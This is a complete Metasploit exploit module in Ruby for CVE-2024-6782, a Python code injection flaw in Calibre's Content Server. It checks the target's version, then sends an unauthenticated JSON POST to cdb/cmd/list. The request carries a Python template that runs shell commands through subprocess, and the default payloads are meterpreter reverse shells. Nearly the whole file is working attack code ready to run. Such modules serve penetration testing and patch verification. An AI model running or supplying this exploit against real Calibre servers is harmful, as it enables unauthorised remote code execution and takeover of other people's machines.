Calibre 7.15.0 Python Code Injection

class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Calibre Python Code Injection (CVE-2024-6782)',        'Description' => %q{          This module exploits a Python code injection vulnerability in the Content Server component of Calibre v6.9.0 - v7.15.0. Once enabled (disabled by default), it will listen in its default configuration on all network interfaces on TCP port 8080 for incoming traffic, and does not require any authentication. The injected payload will get executed in the same context under which Calibre is being executed.        },        'License' => MSF_LICENSE,        'Author' => [          'Amos Ng', # Discovery & PoC          'Michael Heinzl', # MSF exploit        ],        'References' => [          [ 'URL', 'https://starlabs.sg/advisories/24/24-6782'],          [ 'CVE', '2024-6782']        ],        'DisclosureDate' => '2024-07-31',        'Platform' => ['win', 'linux', 'unix'],        'Arch' => [ ARCH_CMD ],        'Payload' => {          'BadChars' => '\\'        },        'Targets' => [          [            'Windows_Fetch',            {              'Arch' => [ ARCH_CMD ],              'Platform' => 'win',              'DefaultOptions' => {                'FETCH_COMMAND' => 'CURL',                'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'              },              'Type' => :win_fetch            }          ],          [            'Linux Command',            {              'Platform' => [ 'unix', 'linux' ],              'Arch' => ARCH_CMD,              'Type' => :nix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'              }            }          ],        ],        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(8080)      ]    )  end  def check    begin      res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(target_uri.path)      })    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError      return CheckCode::Unknown    end    if res && res.code == 200      data = res.body.to_s      pattern = /CALIBRE_VERSION\s*=\s*"([^"]+)"/      version = data.match(pattern)      if version[1].nil?        return CheckCode::Unknown      else        vprint_status('Version retrieved: ' + version[1].to_s)      end      if Rex::Version.new(version[1]).between?(Rex::Version.new('6.9.0'), Rex::Version.new('7.15.0'))        return CheckCode::Appears      else        return CheckCode::Safe      end    else      return CheckCode::Unknown    end  end  def exploit    execute_command(payload.encoded)  end  def execute_command(cmd)    print_status('Sending payload...')    exec_calibre(cmd)    print_status('Exploit finished, check thy shell.')  end  def exec_calibre(cmd)    payload = '['\    '["template"], '\    '"", '\    '"", '\    '"", '\    '1,'\    '"python:def evaluate(a, b):\\n '\     'import subprocess\\n '\      'try:\\n  '\        "return subprocess.check_output(['cmd.exe', '/c', '#{cmd}']).decode()\\n "\      'except Exception:\\n  '\        "return subprocess.check_output(['sh', '-c', '#{cmd}']).decode()\""\    ']'    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'application/json',      'data' => payload,      'uri' => normalize_uri(target_uri.path, 'cdb/cmd/list')    })    if res && res.code == 200      print_good('Command successfully executed, check your shell.')    elsif res && res.code == 400      fail_with(Failure::UnexpectedReply, 'Server replied with a Bad Request response.')    end  endend